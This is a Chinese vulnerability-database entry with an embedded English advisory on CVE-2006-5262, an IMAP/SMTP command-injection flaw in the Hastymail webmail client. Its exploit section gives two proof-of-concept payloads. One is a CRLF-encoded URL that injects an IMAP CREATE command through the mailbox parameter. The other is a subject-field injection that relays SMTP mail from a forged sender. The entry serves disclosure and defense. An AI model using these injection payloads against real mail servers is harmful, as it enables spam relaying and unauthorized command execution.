Hastymail IMAP/SMTP远程命令注入漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1111227 漏洞类型 输入验证
发布时间 2006-10-10 更新时间 2006-10-16
CVE编号 CVE-2006-5262 CNNVD-ID CNNVD-200610-195
漏洞平台 PHP CVSS评分 6.5
|漏洞来源
https://www.exploit-db.com/exploits/28777
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200610-195
|漏洞详情
Hastymail是一个用PHP编写的快速、安全、兼容RFC、跨平台的IMAP/SMTP客户端应用程序。Hastymail在处理用户请求时存在输入验证漏洞,远程攻击者可能利用此漏洞在服务器上执行任意命令。拥有有效Hastymail帐号的用户可以通过在Hastymail变量中嵌入"命令结束"序列直接向IMAP或SMTP服务器发送命令。远程攻击者可以绕过安全限制,尝试攻击IMAP或SMTP服务。
|漏洞EXP
source: http://www.securityfocus.com/bid/20424/info

Hastymail is prone to an IMAP / SMTP command-injection vulnerability because it fails to sufficiently sanitize user-supplied input.

An authenticated malicious user could execute arbitrary IMAP / SMTP commands on the affected mail server processes. This may allow the user to send SPAM from the server or to exploit latent vulnerabilities in the underlying system.

Hastymail 1.5 and prior versions are affected.

This example sends the CREATE IMAP commands to the vulnerable parameter:
http://www.example.com/<path_to_hastymail>/html/mailbox.php?id=47fc54216aae12d57570c9703abe1b7d&mailbox=INBOX%2522%0d%0aA0003%20CREATE
%2522INBOX.vad

The SMTP POST relay example from nonexistant email address is available:

POST http://www.example.com/<path_to_hastymail>/html/compose.php HTTP/1.1

to include:

Content-Disposition: form-data; name="subject"

Proof of Concept
.
mail from: hacker@domain.com
rcpt to: victim@otherdomain.com
data
This is a proof of concept of the SMTP command injection in Hastymail
.
|参考资料

来源:BID
名称:20424
链接:http://www.securityfocus.com/bid/20424
来源:VUPEN
名称:ADV-2006-3956
链接:http://www.frsirt.com/english/advisories/2006/3956
来源:SECUNIA
名称:22308
链接:http://secunia.com/advisories/22308
来源:hastymail.sourceforge.net
链接:http://hastymail.sourceforge.net/security.php
来源:XF
名称:hastymail-imap-command-execution(29407)
链接:http://xforce.iss.net/xforce/xfdb/29407
来源:BUGTRAQ
名称:20061202[ISecAuditorsSecurityAdvisories]IMAP/SMTPInjectioninHastymail
链接:http://www.securityfocus.com/archive/1/archive/1/453417/100/0/threaded